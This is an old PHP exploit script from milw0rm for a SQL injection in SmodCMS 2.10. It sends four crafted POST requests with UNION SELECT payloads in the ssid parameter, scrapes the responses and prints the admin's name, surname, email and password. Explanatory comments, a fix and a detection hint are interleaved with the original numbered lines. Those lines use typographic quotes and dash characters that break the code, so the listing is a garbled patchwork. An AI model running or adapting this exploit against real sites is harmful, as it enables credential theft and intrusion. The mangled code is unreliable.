
SmodCMS 2.10 Slownik ssid Remote SQL Injection Exploit


  1    <?
  2    /*
  3    Autor: Kacper
  4    Contact: kacper1964@yahoo.pl
  5    Homepage: http://www.rahim.webd.pl/
  6    Irc: irc.milw0rm.com:6667 #devilteam
  7
  8    Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.
  9
  10   //dork: "SmodCMS" & "S.ownik"
  11
  12   SmodCMS <= 2.10 (Slownik ssid) Remote SQL Injection Exploit
  13   script homepage/download/demo: http://smod.pl/
  14   */
  if ($argc < 4) {
      // Fewer than three positional arguments: print the usage banner and stop.
      $self = $argv[0];
      $bar = '-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-';
      $lines = array(
          '',
          $bar,
          'Usage: php ' . $self . ' host path slownik_module_id OPTIONS',
          'host:    target server (ip/hostname)',
          'path:     SmodCMS path',
          'slownik_module_id: id number of slownik module (Standard: 10)',
          'Options:',
          ' -p[port]: specify a port other than 80',
          ' -P[ip:port]: specify a proxy',
          'Example:',
          'php ' . $self . ' 127.0.0.1 /SmodCMS/ 10',
          'php ' . $self . ' 127.0.0.1 /SmodCMS/ 10 -P1.1.1.1:80',
          $bar,
          '',
      );
      // Leading and trailing '' entries reproduce the newline that opened and
      // closed the original single-quoted usage string.
      echo implode("\n", $lines);
      exit;
  }
  // 7 == E_ERROR | E_WARNING | E_PARSE: notices (e.g. undefined offsets) are masked.
  error_reporting(E_ERROR | E_WARNING | E_PARSE);
  // No wall-clock limit for the script itself; a silent socket gives up after 5s.
  ini_set('max_execution_time', 0);
  ini_set('default_socket_timeout', 5);
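  /**
   * Render a byte string as a hex dump: one " xx" per byte on the hex part and
   * one " c" per byte on the text part (" ." for bytes <= 32 or > 126, so a
   * space is also shown as "."), with a CRLF inserted after every 15 bytes.
   *
   * Returns the hex part, a CRLF, then the text part. Works on bytes, not
   * characters. An empty input yields just "\r\n". Not called anywhere in
   * this script; kept with the original interface.
   *
   * Fixes: the original used bitwise "|" as a logical OR (correct only because
   * both operands happened to be booleans), recomputed strlen() on every
   * iteration and padded the hex digit with a manual length check.
   */
  function quick_dump($string)
  {
      $hex = '';
      $text = '';
      $len = strlen($string);
      for ($i = 0; $i < $len; $i++) {
          $byte = ord($string[$i]);
          // Only printable ASCII 33..126 is shown literally.
          $text .= ($byte <= 32 || $byte > 126) ? ' .' : ' ' . $string[$i];
          // %02x always yields two hex digits for a byte value.
          $hex .= sprintf(' %02x', $byte);
          // Wrap both parts after every 15th byte.
          if (($i + 1) % 15 == 0) {
              $hex .= "\r\n";
              $text .= "\r\n";
          }
      }
      return $hex . "\r\n" . $text;
  }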
  // Pattern used by wyslijpakiet() to validate the -P value as "a.b.c.d:port".
  // The "(" and ")" are the PCRE delimiters, so the whole match is also group 1.
  // Octet and port ranges are not checked (999.999.999.999:99999 passes).
  52   $proxy_regex = ’(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
  // Sends one raw HTTP request ($packet) either directly to $host:$port or via
  // the $proxy given as "ip:port", and leaves the complete response (status
  // line, headers and body) in the global $html. Returns nothing; a failed
  // connection prints a message and terminates the script. Communicates
  // through globals instead of parameters/return values (PHP 4-era style).
  54    function wyslijpakiet($packet)
  55    {
  56      global $proxy, $host, $port, $html, $proxy_regex;
  57      if ($proxy==’’) {
  // gethostbyname() returns the name unchanged when resolution fails, so a bad
  // hostname only surfaces as the fsockopen() failure below.
  58        $ock=fsockopen(gethostbyname($host),$port);
  59        if (!$ock) {
  60          echo ’No response from ’.$host.’:’.$port; die;
  61        }
  62      }
  63      else {
  // $proxy_regex only checks the ip:port shape; see its definition above.
  64             $c = preg_match($proxy_regex,$proxy);
  65        if (!$c) {
  66          echo ’Not a valid proxy...’;die;
  67        }
  68        $parts=explode(’:’,$proxy);
  69        $parts[1]=(int)$parts[1];
  70        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
  71        $ock=fsockopen($parts[0],$parts[1]);
  72        if (!$ock) {
  73          echo ’No response from proxy...’;die;
  74             }
  75      }
  // Whole request is written in one go; the return value of fputs() is not checked.
  76      fputs($ock,$packet);
  77      if ($proxy==’’) {
  // Direct connection: read line by line until the server closes the socket
  // (the request carries "Connection: Close").
  78        $html=’’;
  79        while (!feof($ock)) {
  80          $html.=fgets($ock);
  81        }
  82      }
  83      else {
  // Proxy path: read one byte at a time. Because the conditions are joined
  // with "or", the loop only ends once EOF is reached AND a CRLFCRLF has been
  // seen; a response that closes without a blank line spins here forever,
  // appending empty reads. eregi() was removed in PHP 7.0, so on such
  // interpreters this line is a call to an undefined function.
  84        $html=’’;
  85        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  86          $html.=fread($ock,1);
  87        }
  88      }
  89      fclose($ock);
  90    }
  // Positional arguments: target host, CMS base path, slownik module id.
  $host = $argv[1];
  $path = $argv[2];
  $slownik_id = $argv[3];
  $port = 80;
  $proxy = '';
  // Optional switches, each glued to its value: -p<port> and -P<ip:port>.
  // The two-character prefix is built from the first two bytes, as before.
  for ($n = 4; $n < $argc; $n++) {
      $arg = $argv[$n];
      $switch = $arg[0] . $arg[1];
      if ($switch == '-p') {
          $port = (int) str_replace('-p', '', $arg);
      } elseif ($switch == '-P') {
          $proxy = str_replace('-P', '', $arg);
      }
  }
  // The path must start and end with "/" so that "index.php" can be appended.
  $firstChar = $path[0];
  $lastChar = $path[strlen($path) - 1];
  if ($firstChar != '/' or $lastChar != '/') {
      die('Bad path!');
  }
  // A proxy needs an absolute URL on the request line; a direct connection uses the bare path.
  if ($proxy == '') {
      $p = $path;
  } else {
      $p = 'http://' . $host . ':' . $port . $path;
  }
  print "SmodCMS SQL Injection Exploit by Kacper\r\n";
  // Four near-identical request/scrape cycles follow; only the selected column
  // differs (Imie = first name, Nazwisko = surname, Email, Haslo = password).
  // The injection point is the ssid query parameter: the payload relies on the
  // CMS placing ssid unquoted in a SQL statement, so "-1 UNION SELECT
  // <column>,1 FROM Uzytkownicy WHERE Grupa=99/*" returns that column of the
  // Grupa=99 (admin) user in place of a dictionary entry and "/*" comments out
  // the rest of the statement. Server-side fix: cast ssid to int or bind it as
  // an integer parameter. Detection: a POST to index.php with UNION/SELECT in
  // the query string and no Content-Length, i.e. a form POST with no body.
  111   $packet ="POST ".$p."index.php?id=".$slownik_id."&ssid=−1+UNION+SELECT+Imie,1+FROM+Uzytkownicy+WHERE+Grupa=99/* HTTP/1.0\r\n";
  112   $packet.="Accept: image/gif, image/x−xbitmap, image/jpeg, image/pjpeg, application/x−shockwave−flash, */*\r\n";
  113   $packet.="Referer: http://".$host.$path."index.php\r\n";
  114   $packet.="Accept−Language: pl\r\n";
  115   $packet.="Content−Type: application/x−www−form−urlencoded\r\n";
  116   $packet.="User−Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
  117   $packet.="Host: ".$host."\r\n";
  118   $packet.="Connection: Close\r\n\r\n";
  // wyslijpakiet() leaves the full response in the global $html.
  119   wyslijpakiet($packet);
  // Fixed 3-second pause between requests.
  120   sleep(3);
  // Scrapes the text between the first <h3> and the following </h3>. If the
  // response contains no <h3>, $temp[1] is undefined: on older interpreters the
  // notice is masked by error_reporting(7) and an empty value is printed rather
  // than reporting the failure.
  121   $temp=explode(’<h3>’,$html);
  122   $temp2=explode(’</h3>’,$temp[1]);
  123   $imie_admina=$temp2[0];
  124   echo "Admin Name: ".$imie_admina."\r\n";
  // Request 2: same request, column Nazwisko (surname).
  125   $packet ="POST ".$p."index.php?id=".$slownik_id."&ssid=−1+UNION+SELECT+Nazwisko,1+FROM+Uzytkownicy+WHERE+Grupa=99/* HTTP/1.0\r\n";
  126   $packet.="Accept: image/gif, image/x−xbitmap, image/jpeg, image/pjpeg, application/x−shockwave−flash, */*\r\n";
  127   $packet.="Referer: http://".$host.$path."index.php\r\n";
  128   $packet.="Accept−Language: pl\r\n";
  129   $packet.="Content−Type: application/x−www−form−urlencoded\r\n";
  130   $packet.="User−Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
  131   $packet.="Host: ".$host."\r\n";
  132   $packet.="Connection: Close\r\n\r\n";
  133   wyslijpakiet($packet);
  134   sleep(3);
  // Same <h3> scrape as above; same undefined-offset behaviour when absent.
  135   $temp=explode(’<h3>’,$html);
  136   $temp2=explode(’</h3>’,$temp[1]);
  137   $nazwisko_admina=$temp2[0];
  138   echo "Admin Surname: ".$nazwisko_admina."\r\n";
  // Request 3: column Email.
  139   $packet ="POST ".$p."index.php?id=".$slownik_id."&ssid=−1+UNION+SELECT+Email,1+FROM+Uzytkownicy+WHERE+Grupa=99/* HTTP/1.0\r\n";
  140   $packet.="Accept: image/gif, image/x−xbitmap, image/jpeg, image/pjpeg, application/x−shockwave−flash, */*\r\n";
  141   $packet.="Referer: http://".$host.$path."index.php\r\n";
  142   $packet.="Accept−Language: pl\r\n";
  143   $packet.="Content−Type: application/x−www−form−urlencoded\r\n";
  144   $packet.="User−Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
  145   $packet.="Host: ".$host."\r\n";
  146   $packet.="Connection: Close\r\n\r\n";
  147   wyslijpakiet($packet);
  148   sleep(3);
  149   $temp=explode(’<h3>’,$html);
  150   $temp2=explode(’</h3>’,$temp[1]);
  151   $Email_admina=$temp2[0];
  152   echo "Admin E−Mail: ".$Email_admina."\r\n";
  // Request 4: column Haslo (password). Whether the stored value is hashed
  // cannot be told from this script. The remaining headers of this request
  // follow on the next lines of the listing.
  153   $packet ="POST ".$p."index.php?id=".$slownik_id."&ssid=−1+UNION+SELECT+Haslo,1+FROM+Uzytkownicy+WHERE+Grupa=99/* HTTP/1.0\r\n";
  154   $packet.="Accept: image/gif, image/x−xbitmap, image/jpeg, image/pjpeg, application/x−shockwave−flash, */*\r\n";
  155   $packet.="Referer: http://".$host.$path."index.php\r\n";
  156   $packet.="Accept−Language: pl\r\n";
  // Remaining headers of the fourth request (column Haslo = password; its
  // request line is built on the preceding lines), then the same
  // send-and-scrape sequence as the three requests before it.
  157   $packet.="Content−Type: application/x−www−form−urlencoded\r\n";
  158   $packet.="User−Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
  159   $packet.="Host: ".$host."\r\n";
  160   $packet.="Connection: Close\r\n\r\n";
  // wyslijpakiet() leaves the full response in the global $html.
  161   wyslijpakiet($packet);
  162   sleep(3);
  // Text between the first <h3> and the next </h3>. With no <h3> in the
  // response $temp[1] is undefined; on older interpreters the notice is masked
  // by error_reporting(7) and an empty value is printed.
  163   $temp=explode(’<h3>’,$html);
  164   $temp2=explode(’</h3>’,$temp[1]);
  165   $haslo_admina=$temp2[0];
  166   echo "Admin Password: ".$haslo_admina."\r\n";
  167   ?>
  169   # milw0rm.com [2007-04-06]



